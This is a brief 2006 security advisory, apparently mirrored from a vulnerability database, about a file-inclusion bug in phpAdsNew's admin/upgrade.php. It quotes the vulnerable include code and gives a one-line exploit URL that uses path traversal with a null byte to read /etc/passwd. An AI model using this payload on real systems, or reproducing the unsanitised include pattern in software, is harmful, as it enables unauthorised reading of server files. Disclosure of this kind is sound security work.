Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14737
HistoryOct 19, 2006 - 12:00 a.m.

phpAdsNew include bug!

2006-10-1900:00:00
vulners.com
15

#######################################
Autors:

  • Michał `wacky` Błaszczak
  • Nobody

http://iHACK.pl
#######################################
File: modules/phpads/admin/upgrade.php

Code:

// Load language strings
if (file_exists("…/language/".$phpAds_config['language']."/default.lang.ph
p"))
include("…/language/".$phpAds_config['language']."/default.lang.php");
else
{
$phpAds_config['language'] = 'english';
include("…/language/english/default.lang.php");
}

Exploit:

http://ihack.pl/phpAdsNew-2.0.8/admin/
upgrade.php?phpAds_config[language]=…/…/…/etc/passwd%00